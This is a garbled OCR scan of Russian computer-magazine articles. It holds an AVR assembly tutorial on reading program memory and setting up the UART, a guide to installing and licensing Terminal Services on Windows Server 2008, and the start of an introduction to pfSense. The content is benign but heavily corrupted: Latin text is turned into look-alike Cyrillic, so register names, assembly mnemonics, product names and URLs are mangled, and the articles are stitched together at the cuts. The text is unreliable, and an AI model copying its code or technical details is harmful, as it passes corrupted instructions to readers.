РЗО заносится младший байт адреса, а в Р31 — старший. 

В коде вы глядит это та К: 

ЬБІ 2Ь, 1оѵ^(сіаСа*2) 

; заносим младший байт адреса, в регистровую пару 2 
ЬВІ 2Н,Мд]т(баба*2) 

; заносим старший байт адреса, в регистровую пару 2 

; умножение на два тут из-за того, что адрес указан в 
двухбайтных словах, а нам надо в байтах. Поэтому и умно- 
жаем на два после загрузки адреса можно загружать число 
из памяти 

ЬРМ Кіб, 2 ; в регистре Кіб после этой команды будет 

число 12 , взятое из памяти программ 

В ПОШЛИ ВСЕХ ПОДАЛЬШЕ 

Одной из самых любимых моих штуковин, запрятанных в дебрях 
контроллера, является ОАРТ. Он же — последовательный асинхрон- 
ный порт, работающий по протоколу В5232 — тому же самому, что и 
известный тебе ООМ-порт. 

Чтобы послать байт, понадобится отправить командой ОІЯ в регистр 
ООВ (ОАВТ Оаіа Ведізіег) число, а чтобы принять байт, соответс- 
твенно, нужно оттуда число командой ІМ считать. 

Но, предварительно, передатчик надо сконфигурировать, так как 
НАНТ умеет работать почти на всех мыслимых и немыслимых вари- 
ациях протокола Н5232. Конфигурируется НАНТ посредством трех 
контрольных регистров — НС5НА, НС5НВ, НС5НС и регистровой 
пары иВННН:НВНН1, в которую записывается делитель скорости 
передачи. 

В НС5РА нас, в первую очередь, интересуют биты ВХС и ТХС — фла- 
ги, сигнализирующие завершение приема и передачи. Отслеживая 
их, можно прикидывать, что делать дальше — забирать с веже полу- 
ченный байт или готовить новую передачу. Бит ОВНЕ (ООН Еппріу) 
сигнализирует о том, что прошлый байт передан, и в ООН можно 
загружать следующий байт. От ТХС его отличаетто, что он выстав- 
ляется при передаче каждого байта, а ТХС только при окончании 
передачи вообще. 

Ну и не следуетзабывать про бит 02Х, осуществляющий удвоение 
скорости передачи. 

Регистр 0С5РВ интересен своими битами РХСІЕ, ТХСІЕ и ООРІЕ, 
разрешающими прерывания по окончании приема, передачи и 
опустошении буфера приема. Это позволяет не тупо ждать заверше- 
ния, а перевесить весь геморрой с приемо-передачей на обработ- 
чики прерываний. Также тут находятся биты РХЕМ и ТХЕМ, которые 
разрешают прием и передачу (соответственно). 

Регистр 0С5РС содержит информацию о формате передачи, коли- 
чество стоп битов, сколько бит в посылке, какой контроль четности, 
синхронный или асинхронный режим передачи. Причем, тут есть 
один косяк, из-за которого я долго тупил всвоевремя — бит селекто- 
ра 0Р5ЕЕ. Дело в том, что по неизвестной причине создатели реши- 
ли сэкономить байт адреса и разместили регистры ЕІС5РС и иВРРН 
в одной адресном пространстве. Какже определить, куда записать? 
А по старшему биту! Поясню на примере. Если мы записываем чис- 
ло, у которого седьмой бит равен 1, то оно попадет в11С5ПС,аеслиО, 
то ПВРРН. Смотри КОД: 

ЬВІ кіб , ОхІОООООІОЬ ; старший бит равен 1 

ОПТ ивккн,кіб ; оба -на! заводим вроде бы в 

ІІВККН, а реально попадает в ІІСЗКС 



Или ВОТ: 

ВВІ кіб , ОхООООООЮЬ ; старший бит равен О 
ОРТ иСЗКС,КІб ; заводим вроде бы в ІІСЗКС, а реально по- 
падает в ІІВККН 

Воттакая вотзагогулина! А во всем виноват переключающий бит, так 
как, сточки зрения компилятора, метки СВВЕН и ПС5ВС ведут в одно 
место. Если заглянуть в тВсіеІ . іпс, то увидим там следующие строки: 

. ери НВККН= 0x2 0 
.ериНСЗКС= 0x2 0 ; ЧТД! 

Ну что, теория кончилась, сейчас выдам тебе голую практику. А 
конкретно — инициализирующую процедуру, настраивающую СІАВТ 
на работу со стандартным виндовым терминалом. Восемь бит, один 
старт/стоп! 

иагЦ_іпіР: ; для начала удобные макросы: 

.ери ХТАВ = 8000000 ; частота твоего контроллера в герцах 
.ери ЬаибгаРе = 9 600 ; сколько надо бод 

.ери Ьаиббіѵібег = ХТАВ/ ( 1б*ЬаибгаРе) -1 
; подсчет делителя 

ВВІКІб, 1оѵ\[ (Ьаиббіѵібег) 

оит ивккв,к1б 

ВВІ кіб, НідН (Ьаиббіѵібег ) 

ОРТ НВККН,КІб 

ВВІ Кіб , о 

ОВТ ВСЗКА, Кіб 

ВВІ Кіб, (1«КХЕЫ) I (1«ТХЕЫ) I (0«КХСІЕ) | (0«ТХСІЕ) 

; запреіцаем прерывания от любых действий ІІАКТ, разреша- 
ем прием и передачу не пугайся такой жуткой записи, это 
логическая формула, которая на основании номеров битов 
расставит все сама по местам. Это лучше, чем вводить 
00011000 - меньше наделаешь ошибок ОВТ ВСЗКВ, Кіб; и за- 
гружаем сформированное в Кіб число в регистр 
ВВІ Кіб, (1«ВКЗЕВ) I (1«ВС320) | (1«ВС32І) 

ОВТ возке, Кіб 

; благодаря выставленному биту-селектору ВКЗЕВ, данные 
уйдут в нужный регистр выставив две единички в ВС321/0, 
я задал посылку 8 бит — стандартная для СОМ порта 
КЕТ ; возврат к основной процедуре 

Теперь, чтобы послать число во внешний мир, нужно всего лишь 
дождаться готовности и забросить его в регистр ПОП. Отправим наше 
послание человечеству через ОАЕТ. У кого как, а у меня послание обыч- 
но начинается с буквы «Е» :). 

КСАВВ иагВ_іпіВ ; вызываем нашу процедуру инициализации 
ВВІ Кіб, ’Е' ; загоняем в регистр код буквы "Е" 

иагВ_зпВ : 

ЗВІЗ ВСЗКА, ВВКЕ 

КВМР иагВ_зпВ ; торчим на этом цикле , пока бит ВВКЕ не 
станет " 1 " 

ОВТ ВВК, Кіб ; засылаем нашу букву в порт и ловим ее на 
другом конце провода : ) 

Н КЕТІ 

Воттак, камрад. Для начала хватит. Своего первого робота или другую 
полезную безделушку на этом сделать можно запросто. Если интересует 
больше, то вперед, в инет. На сайте Ьир://еа5ѵеІесІ:гопіс5.ги есть не- 
плохой, на мой взгляд, учебный курс по АѴВ, где на примере постройки 
робота последовательно и подробно изучается использование контрол- 
лера АТМЕ6А8. 
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СЕРГЕЙ «ОВІМОЕВ» ЯРЕМЧУК 



ЧЯЯШ. 
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ТЕРМИНАЛЬНОГО 

ДОСТУПА 



НАСТРОЙКАСЕРВЕРАТЕРМИНАЛОВВ>ѴтОО>Ѵ55ЕКѴЕК2008 



В состав ѴѴіп2к8 входит полнофункциональная и высокопроизводительная 
версия служб терминалов. С ней организация удаленного безопасного 
многопользовательского доступа к приложениям для администратора 
уже не станет сложной задачей. 



НОВЫЕ ГОРИЗОНТЫ 

Возможность удаленного запуска программ, установленных на сервере, 
была реализована еще во времена гигантских мэйнфреймов. С переходом 
на персональные компьютеры, увеличением мощности систем и появле- 
нием быстрых каналов терминальный доступ обрел вторую жизнь. К числу 
основных преимуществ применения служб терминалов стоит отнести: 

• Уменьшение затрат на оборудование. Так как все вычислитель- 
ные операции выполняются на сервере, а клиентские системы лишь 
выводят на экраны изображения с сервера, аппаратные требования 
к терминалам минимальны (например, это могут быть маломощные 
бездисковые станции под управлением ѴѴіпСЕ или Тіпих) . 

• Облегчение работы (для службы техподдержки). Т5 позволяет 
администратору не только видеть, что происходит в пользовательском 
сеансе, но и управлять им. 



• Централизованное управление ПО. Все программы находятся на 
одном сервере — это упрощает их установку и обновление. 

• Дистанционный доступ: пользователи могут соединяться с Т5-сер- 
вером из любой точки планеты, где есть интернет, причем подключе- 
ния с низкой пропускной способностью не станут помехой. 

• Простота защиты данных: грамотно применяя объекты групповой 
политики и перенаправление папок с использованием служб терми- 
налов, можно обеспечить безопасность пользовательских данных 
(разграничение доступа + централизованное резервирование). 
Средство удаленного запуска приложений впервые появилось в ѴѴіпМТ 
4.0 Зегѵег, в выпуске Тегтіпаі Зегѵег Ебіиіоп. Начиная с \Ѵіп2к, это уже 
полностью встроенный компонент для всех серверных ѴѴіпсіоѵѵз. С 
каждой новой версией возможности сервера терминалов возраста- 
ли, а администрирование становилось удобнее и понятнее — выход 
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Ьоп^Ьогп не стал исключением. 

В ѴѴіп2к8 следует отметить появление шлюза служб терми- 
налов (Т5 Санеѵѵау) , который позволяет подключаться к Т5 
и удаленным рабочим столам с любого устройства через 
небезопасные сети. Шлюз туннелирует ШЭР-сеансы через 
защищенный НТТР5 и создает безопасные соединения 
между компьютерами (даже если те располагаются за МАТ) . 
Такой шлюз может заменить применение ѴРМ при подклю- 
чении к корпоративной сети, а использование стандартного 
443 порта снимает необходимость в перестройке правил 
межсетевого экрана. Кроме того, возможность подключенрія 
к нескольким терминальным серверам и конфигурирование 
настроек через одну консоль управления заметно упрос- 
тят процедуру администрирования. Теперь не возникнет 
путаница с доступом для нескольких серверов, достаточно 
настроить все один раз на Т5 СаЮѵѵау. Если задействуется 
сервер сетевых политик (МР5) или І5А, — их можно также 
использовать для проверки политик. 

Раньше пользователь долго привыкал к наличию двух рабочих 
столов (локального и удаленного) и частенько путал, куда 
сохранять результаты работы. Обычно это заканчивалось 
вызовом админа и совместным поиском пропажи. Отныне 
все позади. Технология удаленных программ (Т5 КетоюАрр) 
позволяет запускать приложения с помощью служб терми- 
налов, которые внешне выглядят и ведут себя, как обычные 
настольные приложения. При запуске на одном Т5 нескольких 
удаленных приложений они делят между собой общий сеанс. 
Чтобы пользователи могли получать доступ к КетоюАрр, 
администратор должен сначала их опубликовать. 

Веб-доступ к службе терминалов (Т8 ѴѴеЬ Ассе88) — еще 
одна новинка, позволяющая подключаться к Т5, используя 
веб-браузер, а также получать список доступных приложе- 
ний КетощАрр. 

Технология единого входа (5іп§1е 5і§п Оп) избавляет поль- 
зователя от необходимости многократного ввода логинов и 
паролей. Больше не требуется для перехода от одного ресурса 
к другому повторно вводить учетные данные. Правда, воз- 
можность 550 доступна только клиентам ѴІ5і:а и \Ѵіп2к8. 
Печать из службы терминалов упрощена: пользователь, 
выполняющий печать из КетощАрр или из сеанса подклю- 
чения к удаленному рабочему столу, имеет доступ ко всем 
функциям локального или любого другого доступного на 
сервере принтера. 

В ѴѴіп2к8 используется обновленная версия протокола 
удаленного доступа КВР 6 (Кетоне Пезкнор Ргоносоі) . 

Чтобы воспользоваться всеми возможностями новой 
версии, понадобится более свежий клиент — Кетоіе 
Пе8кі;ор Соппесііоп (КОС) 6.1. Только в этом случае бу- 
дут доступны 32-битный цвет, разрешение экрана вплоть 
до 4096x2048, стиль оформления Ѵізна, сглаживание 
шрифтов, поддержка нескольких мониторов, РпР -девай- 
сов, музыкальных плееров, цифровых камер и ряда других 
сервисов. Клиент КОС 6. 1 по умолчанию входит в состав 
сервера \Ѵіп2к8, для Ѵізна включен в 5Р 1, для ѴѴіпХР — в 
5РЗ. Возможна работа и со старой версией клиента, но 
администратор должен это явно разрешить. 

УСТАНОВКА СЛУЖБЫ ТЕРМИНАЛОВ 

Перейдем к установке службы терминалов. Открываем 
5егѵег Мапа^ег, выбираем во вкладке Коіез ссылку Асісі Коіез, 
в списке ролей — Тегтіпаі Зегѵісез, затем в списке «Службы 
роли» (Коіе Зегѵісез) отмечаем те, которые надо установить. 

В списке предложены пять служб: собственно Тегтіпаі 5егѵег, 
обеспечивающий «классическую» функциональность, «Сер- 
вер лицензий» (Т5 Еісеп5Іп§), Т5 Сатѵѵау, Т5 ѴѴеЬ Ассезз и Т5 



Зеззіоп Вгокег. В зависимости от назначения сервера, можно 
все службы роли установить на одном компьютере. Компо- 
нент Т5 Зеззіоп Вгокег, входящий в состав не только ѴѴіп2к8, но 
и ѴѴіп2кЗ Епиегргізе и Паі:асепі;ег Ебкіоп, является упрощенной 
альтернативой службы балансировки (ЫЕВ) и распределяет 
новые сеансы по наименее загруженным серверам в составе 
фермы и обеспечивает подключения пользователей к пре- 
рванному сеансу. Сервер с Т5 перед установкой обязательно 
должен быть присоединен к домену (если таковой имеется), 
иначе некоторые настройки будут недоступны, а при выборе 
Т5 Зеззіоп Вгокег установка и вовсе прервется. Рекомендуется 
размещать сервер Т5 Санеѵѵау и Т5 ѴѴеЬ Ассезз в периметре 
сети, а сам Т5 — за межсетевым экраном. 

Итак, отмечаем нужные пункты (как минимум, Тегтіпаі 
5егѵег и Т5 Еісепзіп^) . Для некоторых вариантов потребуются 
дополнительные роли, о чем сообщит появившееся окно. Так, 
роль сервера Т5 ѴѴеЬ Ассезз потребует установки роли ѴѴеЬ 
5егѵег (ІІ5) и ѴѴіпсіоѵѵз Ргосезз АсЦѵаПоп Зегѵісе, а выбор Т5 
Санеѵѵау — ѴѴеЬ 5егѵег (ІІ5) и ИеПл^огкРоИсу 5егѵег. Опреде- 
лимся с методом аутентификации. На выбор тут два варианта, 
причем установки по умолчанию нет. «Ке^иі^е НеПл^огкТеѵеІ 
АиШепПсаПоп» означает, что к серверу смогут подключаться 
только компьютеры с совместимыми версиями ОС и терми- 
нального клиента Кетою Оезкиор СоппесПоп. Другой вариант 
предназначен для тех случаев, когда есть клиенты с устарев- 
шей версией КОС (это снижает защищенность Сети, так как 
ранние версии имели проблемы с безопасностью) . 
Следующий шаг позволяет указать режим лицензирова- 
ния. Здесь пока можно выбрать Сопй^иге Еанег, а лицензии 
настроить позже. После чего переходим к настройке поль- 
зователей и групп, которым будет разрешен доступ к Т5. 
Первый этап завершен. Далее настройки могут отличаться 
в зависимости от выбранных служб роли. Скажем, если 
для установки был выбран Т5 Еісепзіп^, то в следующем 
окне следует указать область, где будет представлен сервер 
лицензирования. Варианта три: ѵѵогк^гопр, сіотаіпи Іогезі;. 

В зависимости от текущих настроек сервера, на котором 
производится установка, некоторые пункты будут неактив- 
ны. По умолчанию хранилище лицензий располагается в 
Ѵ^іпйоѵ^з \ зу зЬетЗ 2 \ЬЗегѵег. При помощи кнопки Вгоѵѵзе 
можно указать другой каталог. 

Когда выбран Т5 Санеѵѵау, мастер запросит 55Е-сертификат, 




>ѵѵагпіпд 

Сервер с Т5 перед 
установкой роли реко- 
мендуется присоеди- 
нить кдомену, иначе 
некоторые настройки 
будут недоступны. 




> Ипкз 

Подробную ин- 
формацию по всем 
настройкам РОР 
можно найти на сайте 
МІСГ 050 Й, в документе 
зуррогСтісгозоИ:. 
сот/кЬ/885187/еп-из . 



Дця работы некоторых гоіе зегѵісез понадобятся дугиеролиі 
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> ІП^О 

• Каждый пользо- 
вательский сеанс 
полностью изолиро- 
ван от других сеансов 
на этом Т5-сервере. 
Ошибки какой-либо 
программы в одном 
сеансе не повлияют 
на работу других 
пользователей. 

• Создать и получить 
сертификат, необхо- 
димый для работы 
компонентов Т5, можно 
в консоли Іпіегпеі 
Іп^огтаііопЗегѵісез 
(N5) Мападег — «Сер- 
тификаты сервера». 
Весь процесс подробно 
описан в предыдущем 
номере (Х_08_2008), в 
статье «Слоеный ѴРМ». 

• Ретоіе Оезкіор раз- 
решаетдва подключе- 
ния для администра- 
тивных целей, которые 
не требуют лицензий. 

• Рекомендуется раз- 
мещение Т5 баіеѵѵау 

и Т5 ѴѴеЬ Ассевв в пе- 
риметре сети, а самого 
Т5 — за межсетевым 
экраном. 




который будет использован для работы по защищенному 
протоколу НТТР5. Если в организации есть центр сертифика- 
ции, можно экспортировать созданный им сертификат. Иначе 
возможно использование самоподписанного сертификата 
(Сгеане а зеіб-зі^есі сеітШсаНе бог 55Е Епсіурніоп) . Этот вариант 
рекомендуется для тестовых целей или небольших органи- 
заций. Дтя Т5 Санеѵѵау также понадобится создать политику 
авторизации (Апі:1іогІ2аі:іоп РоИсу), где определяются группы 
пользователей, которые смогутподключаться кшлюзуТЗ. 

По умолчанию такое подключение разрешено только членам 
группы АсітіпізЩаШгз. Кроме ввода пароля, доступно исполь- 
зование Зтагі: Сагб. Если в организации несколько Т5, здесь же 
можно указать, к каким из них будут подключаться конкрет- 
ные пользователи. 

Если устанавливается ІІ5, то специальный пункт настро- 
ек будет посвящен выбору его компонентов. Проверяем 
установки в последнем окне; обращаем внимание, что для 
корректной работы в режиме Т5 некоторые приложения, 
возможно, придется переустановить. Расширенные на- 
стройки безопасности ІЕ также будут выключены. 

По завершению установки потребуется перезагрузка, 
после которой в систему будут добавлены еще некоторые 



|При помощи Т5 ѴѴеЬ Ассезз можно подключиться кТд 




элементы, в частности, оснастки консоли ММС. В итоге 
появится окно 1п51:а11айоп Кезпк с резюме. Если в ходе 
установки Т5 Еісепзіп^ не настраивался, появится предуп- 
реждение о том, что режим лицензированрія не настроен 
и будет показано количество дней до окончания льготного 
периода. 

НАСТРОЙКА СЛУЖБЫ ТЕРМИНАЛОВ 

С этого момента пользователи, которым был разрешен до- 
ступ к Т5, уже могут подключаться. Если был установлен Т5 
ѴѴеЬ Ассезз, то, набрав в браузере адрес Ьшр: //127.0.0.1 Аз. 
можно проверить его работу. 

Настройки службы терминалов производятся в Зегѵег 
Мападег. В меню Коіез после установки появится дополни- 
тельный пункт Тегтіпаі Зегѵісез. Как и для других компо- 
нентов ѴѴіп2к8, в основном окне выводятся все сопостав- 
ленные события, состояние отдельных сервисов и список 
установленных служб роли. Здесь же даны рекомендации 
по дальнейшей настройке. В подменю доступны настрой- 
ки отдельных сервисов. Кстати, некоторые консоли можно 
вызвать из меню АбтіпІ5і;гаі;іѵе Тооіз — Тегтіпаі Зегѵісез 
или из командной строки. Например, для Тегтіпаі Зегѵісез 
Сопбі^пгайоп вводим в терминале или окне Кип команду 
изсопбі^.тзс. 

Кратко рассмотрим некоторые из настроек. Большая часть их 
доступна в меню Т5 КетощАрр. Так, нажав на ссылку Скап^е 
возле надписи Тегтіпаі Зегѵег Зешп^з, мы вызываем окно 
КетощАрр Веріоутещ Зепіп^з. Окно состоит из пяти вкладок 
— в них можно изменить основные параметры сервисов. 

В частности, указать имя Т5 и другой номер КВР-порта, 
разрешить или запретить (по умолчанию) пользователям 
запускать программы, не включенные в список (ипИзНеб), 
настроить параметры подключения к Т5 СаЮѵѵау. Во вкладке 
Ві^каі Зі^паШге нужно обязательно указать сигнатуру, 
которая будет использована для подписи гбр-файлов. Это 
позволит пользователям проверять их источник. В Соттоп 
КВР 5ешп§8 указываются ресурсы (диски, устройства и так 
далее) , которые будут доступны после подключения, а также 
количество цветов и сглаживание шрифтов. Дополнительные 
параметры КЭР-соединения задаются на вкладке СизШт КВР 
Зеипп^з. Подробную информацию по всем возможным пара- 
метрам можно найти в документе по адресу зирроги.тісгозок. 
сотАЬ/885187/еп-и5 . 

Чтобы удаленные пользователи могли подключаться к рабо- 
чему столу нажатием одной кнопки Т5 ѴѴеЬ Ассезз, кликаем 
по ссылке Скап^е, которая расположена возле подписи «А 
гетоне безкшр соппесі:іоп Іог і;кІ5 зегѵег І8 поі: ѵізіЫе іп Т5 ѴѴеЬ 
Ассезз», и отмечаем флажок в поле Кетою безкшр ассезз. 
Список приложений, которые будутдоступныддя работы с 
Т5, настраивается в меню Т5 КетоюАрр. Но перед тем как 
добавить сюда программу, вначале следует ее праврітьно 
установить. Ддя этого в Соппгоі Рапеі выбираем пункт ІпзЩІІ 
Арріісапоп оп Тегтіпаі Зегѵег: откроется мастер установки при- 
ложений. Хотя он и подписан как«РІорру Шзкапд СВ-КОМ», 
можно указать исполняемый файл инсталлятора на локальном 
диске. Далее программа устанавливается обычным способом. 
По ее окончании нажимаем в мастере кнопку Сапсеі или Еіпізк, 
чтобы отменить или зафиксировать установку. 

Можно приступать к созданию гбр-файла. В настройках 
Т8 КетоІеАрр нажимаем ссылку Асісі КетоюАрр Рго^гатз. 

В окне КетоІеАрр ѴѴігагйдобавляем программы в список 
доступных. По окончании работы мастера в пустовавшем 
поле Кетоі:еАрр Рго^гат появится список отобранных про- 
грамм. Выбираем нужную и вызываем контекстное меню. 
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Чтобы создать гф-файл, достаточно кликнуть пункт Сгеаі:е гсір Рііе. Сно- 
ва появится мастер Кетоі:еАрр ѴѴігагсі. В большинстве случаев можно 
оставить все предлагаемые по умолчанию установки, смело нажимая 
Мехи. На шаге Зресі^ Раскате Зешп^з есть возможность изменить 
настройки сервера терминалов, Т5 Санеѵѵау, к которому будет подклю- 
чаться клиент при запуске этого файла, и установки сертификата. После 
создания профильного файла его тут же можно проверить, запустив на 
локальном компьютере. 

При помощи других пунктов контекстного меню можно создать 
тзі-файл, показать или убрать из списка Т8 ѴѴеЬ Ассе88. При создании 
тзі-файла дополнительно можно настроить вывод ярлыка на рабочий 
стол и в меню «Пуск», а также задать ассоциации файлов. Установить 
созданный тзі-файл на терминальные клиенты можно разными спосо- 
бами: от ручного до применения групповых политик. 

Чтобы просмотреть список терминальных сеансов, их статус, поль- 
зователей, процессы, нужно зайти в меню Тегтіпаі Зегѵісез Мапа^ег. 
Здесь же администратору под силу отключить любого пользователя или 
отправить ему сообщение. 

ЛИЦЕНЗИРОВАНИЕ СЛУЖБЫ ТЕРМИНАЛОВ 

Как и в предьщущих версиях системы, служба терминалов требует 
лицензирования. За раздачу лицензий отвечает специальная служба 
Т5 Ьісеп8Іп§ (Тегтіпаі 5егѵегТісеп8Іп§), которая управляет вьщачей 
маркеров для нескольких Т5. Доступны два варианта лицензии Т5 САІз 
(СІіетАссеззТісепзез): на пользователя (РегПзег) или на устройство 
(Рег Веѵісе) . В режиме Рег Пзег использование одного логина для досту- 
па нескольких пользователей будет нарушением лицензии. 

Ддя тестирования работы ТЗпредусмотренльготный период в 120 дней, в 
течение которого лицензии не требуются. Но если в предыд ущей версии 
за начало отсчета бралось время первого подключения клиента к серверу 
терминалов, тосейчасчасы начинают обратный отсчет с момента 
установки. Кроме того, КетоЩ Пезкшр поддерживает два подключенрія 
для административных целей, которые не требуют лицензий. 

Если сервер лицензий не был настроен при установке, то нужно сделать 
это сейчас. В Асітіпізигайѵе ТооІ8 выбираем Т5 Еісепзіп^ Мапа^ег, 
находим в раскрывающемся списке АН зегѵег свой сервер (он помечен 
красным крестиком) и в контекстном меню — пункт Асйѵане. Появит- 
ся мастер АсйѵаЩ Зегѵег ѴѴігагсі. Вначале потребуется выбрать метод 
соединения: лучше оставить «автоматическое» (АпШтайс соппесніоп), 
оно наиболее удобно. Как вариант, для ввода лицензии предлагается 
использовать веб-браузер или телефон. После соединения с сервером 
МІСГ 050 І 1 : вбиваем данные о компании. В последнем окне смотрим, 
чтобы был установлен флажок ІП8і:а11 Еісепзез ѴѴігагсі, который и будет 
запущен далее. В новом мастере, в окне Еісепзе Рго^гат, указываем 




ІВыбордосТупных для работы сТ5 программ] 

программу лицензирования и вводим номер соглашения. При помощи 
списков на странице Ргобиси Ѵегзіоп апсі Еісепзе Туре указываем версию 
Т5, тип лицензий и их количество. 

Лицензирование служб терминала настраивается в консоли 
Тегтіпаі 5егѵісе8 СопП§ига1:іоп. Находим в окне Есііі: 5еі:і;іп§5 пункт 
Тегтіпаі Зегѵісез Исепзіп^ тобе и дважды щелкаем по ссылке, чтобы 
открылось окно свойств. Во вкладке Еісепзіп^ выбираем тип лице- 
зии: Рег Пзег или Рег Пеѵісе. По умолчанию сервер лицензирования 
определяется автоматически (Аинотанісаііу Пізсоѵег а Исепзе зегѵег) ; 
если все в порядке, так и оставляем. При возникновении проблем 
параметры придется ввести вручную в Пзе зресШеб Исепзе зегѵегз. 
Выбрав в левой панели Еісепзіп^ Піа^позіз, получаем подробности 
лицензирования. 

РАДОСТЬ АДМИНИСТРАТОРА 

Технология служб терминалов, призванная улучшить работу конечного 
пользователя и облегчить жизнь администратора, продолжает эволюцио- 
нировать. По сравнению с предыдущими версиями, в реализации службы 
терминалов ѴѴіп2к8 сделано большое количество усовершенствований, 
расширены функциональные возможности и исправлены некоторые баги. 
Нововведения, наверняка, по праву оценят администраторы, в задачу кото- 
рых входит организация подобного сервиса . ~й~ 
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На страже 

БЕЗОПАСНОСТИ 



РР5ЕМ5Е: ПОПУЛЯРНЫЙ ДИСТРИБУТИВ для СОЗДАНИЯ РОУТЕРА 



Для организации совместного доступа в Сеть и защиты внутренних ресурсов 
администраторы со стажем предпочитают использовать специализирован- 
ные мини-дистрибутивы, построенные на базе урезанных версий Ьіпих или 
В50, С их помощью можно легко превратить маломощный комп в надежный 
маршрутизатор. К подобным решениям как раз и относится рі^Зепзе. 



о ПРОЕКТЕ 

В сентябре 2004 года стартовал проект р^Зепзе [ уууууу.р^зепзе.сот ]. основ- 
ное назначение которого — превращение обычного компа в роутер с про- 
двинутыми функциями межсетевого экрана. Родительским дистрибутивом 
был тОпОѵѵаІІ (представляет собой мини-версию РгееВЗВ для создания 
маршрутизаторов и файрволов на базе бездисковых систем, с загрузкой с 
СВ-РОМ или РІазЬ-карты). Ограничения «родителя» [скромные возмож- 
ности, жесткие лимиты по размеру, строгое ориентирование на встроенные 
устройства) были не по душе Крису Бойхлеру, и он взялся за создание 
нового дистрибутива. 

За несколько лет разработки функциональность была увеличена на порядок 
[по сравнению с «папашей»), кроме того, значительно возросло количество 
доступных приложений. Сегодня пользователи получили бесплатное ре- 
шение, по своим возможностям не уступающее некоторым коммерческим. 



Платой за функциональность послужил чуть больший размер дистрибутива 
и более высокиетребования, предъявляемые каппаратной части, в част- 
ности, кобъему ОЗУ [хотя по современным меркам они не высоки). 

В рі^Зепзебыл выполнентехнический редизайн. Так, если тОпОѵѵаиво вре- 
мя работы практически не обращается кжесткому диску и держит настрой- 
ки в основном в ОЗУ [что, в общем-то, оправдано), то рі^Зепзе работает как 
обычный дистрибутив. И хотя доступна ЕтЬесІсІесІ-версия для встроенных 
устройств, это направление не является приоритетным. 

Текущая версия р^Зепзе 1 .2, вышедшая в феврале 2008 года, базируется на 
РгееВЗВ 6.2. О ней мы и познакомимся. 

ВОЗМОЖНОСТИ РР5ЕН5Е 

В качестве средства фильтрации в рі^Зепзе используется «опеночный» 
Раскеі: Ріііегс интегрированным АРТО и поддержкой нормализации 
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пакетов. Само собой, есть и МАТ, статические маршруты, 

ѴІАМ. Роутер можно перевести в режим прозрачного моста. В 
отличие от тОпОѵѵаи, поддерживается работа с несколькими 
ѴѴАМ -интерфейса ми — с балансировкой как исходяідих, так и 
входя [дих соединений. Это обеспечит равномерное распре- 
деление нагрузки по нескольким серверам. Поддержка прото- 
кола САРР (Соттоп Асісігевв Ребипсіапсу Ргоіосоі) позволяет 
организовать отказоустойчивый кластер шлюзов. 

Но тип канала для ѴѴАМ имеет ограничения. С протоколами 
РРРоЕ, РРТР или ВідРопб (австралийский интернет-про- 
вайдер) можетбыть настроен только один внешний канал. 
Остальные сетевые интерфейсы должны получать статический 
или динамический ІР-адрес. 

Крометого, в состав р^Зепве входят: сервер и клиент РРРоЕ, 
сервер и агент ретрансляции ВНСР, сервер ВМ5, ЕТР-прокси, 
Сарііѵе Рогіаі с возможностью аутентификации через РАВІСІ5. 
Имеются средства для подключения к виртуальным частным 
сетям и организации такого сервиса по протоколам ІРвес, 
РРТР, ОрепѴРМ. Поддерживается 5ММР, а РРВ-графики 
позволяют в наглядном виде получить информацию о загрузке 
систем, каналов и пр. 

Все настройки производятся при помоіци понятного веб- 
интерфейса, который, хоть и не локализован (работы ведутся), 
но при базовом английском и знании сетей осваивается за 
несколько часов. 

Есть возможностьустановки с сайта р^Эепве дополнительных 
пакетов, расширяющих и без того немалые функции. Также 
можно попробовать добавить нужный пакете ближайшего 
зеркала ЕгееВЭВ при помощи утилиты ркд_абб. 

Единственный на сегодняшний день недостаток проекта — нет 
нормальной документации. Все, что касалось предыдущего 
релиза, устарело и уже удалено с бос.р^вепве.огд. Под новую 
версию НОѴѴТО’шкитолько начинают появляться. Поэтому 
единственным полноценным документом можно считать 
т0п0ѵѵаиНапсІЬоок( бос.т0п0.сИ/ИапбЬоок ). который касает- 
ся р^Зепве лишь частично, атакже несколько ^ІавИ-руководств 
и видеоуроков. 

ЗАПУСКАЕМ В РАБОТУ 

На зеркалах, список которых доступен на странице загрузки 
продукта, выложены две версии рі^Зепве: для встроенных 
устройств и ЕіѵеСВ-ІпвІаиег. Второй вариантболее универ- 
сальный, поскольку может работать и какЕіѵеСВ, и устанав- 
ливаться на жесткий диск. Размер дистрибутива небольшой 
— всего 60 Мб. 

Минимальныетребования, предъявляемые кжелезу, следую- 
щие: компьютер с частотой процессора 100 МГц, 128 Мбопера- 
тивной памяти и дискобъемом 1 Гб для установки системы. Для 
ЕтЬеббеб данные аналогичны, только для установки достаточ- 
но иметь 128 Мб флешку. Такой компьютер будет без проблем 
обслуживать 10-мегабитную сетку с необходимыми функциями, 
но при увеличении скорости или функций (например, подсчете 
трафика) требуется более мощное оборудование. При установ- 
ке есть возможность выбрать ядро с поддержкой многопроцес- 
сорных систем, поэтому под роутер можно смело задействовать 
самый современный компьютер. Более конкретныетребова- 
н ИЯ для разных вариантов использования рі^Зепве описаны на 
сайте проекта в документе «НагсІѵѵагеЗігіпд Ѳиісіапсе». Инфор- 
мацию о совместимом оборудовании можно найти в «ЕгееВЭП 
6.2 Нагсіѵѵаге СотрабЬІІІІу Еіві» на сайте ЕгееВЗО. 

Итак, записываем образ и загружаемся. Скрипты загрузки 
проанализируют имеющееся оборудование. После инициа- 
лизации будет выведен списоксетевых карте предложением 
настроить ѴЕАМ-, ГАМ- и ѴѴАМ- сетевые интерфейсы. Сначала 
идетѴЕАМ: 
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(Консольное меню Р15е П5|| 



Во уои ъ?ап1: Со зеС ир ѴВАВз поъ? [у I п] ? 

В принципе, если настройки сети известны, то ѴЕАМ можно 
задействовать прямо сейчас, нажав «у» и введя рагеп1-ин- 
терфейс (список сетевух будет выведен повторно). Однако 
большинству пользователей будетудобнее при помощи 
консоли настроить лишь внутренний ЕАМ-интерфейс. Осталь- 
ныеже сконфигурировать при помощи графического меню. 
Если выход в Сеть производится через РРРоЕ или РРТР, то 
из-за специфики веб-интерфейса придется в любом случае 
поднимать ѴЕАМ (в разделе «Настройка через веб» я покажу, 
как это сделать). На следующем шаге скрипт предложит ввести 
название ЕАМ-интерфейса. 

ЕпСег а ВАВ іпСегТасе пате ог 'а' Тог 

аиОосіеЦесЦіоп : ТхрО 

Аналогично настраивается ѴѴАМ и дополнительные (ОрЕопаІ) 
интерфейсы. Впоследствии вместо ОрЕопаІ им можно дать 
любое другое название (например, ВМ2). Когда настройки 
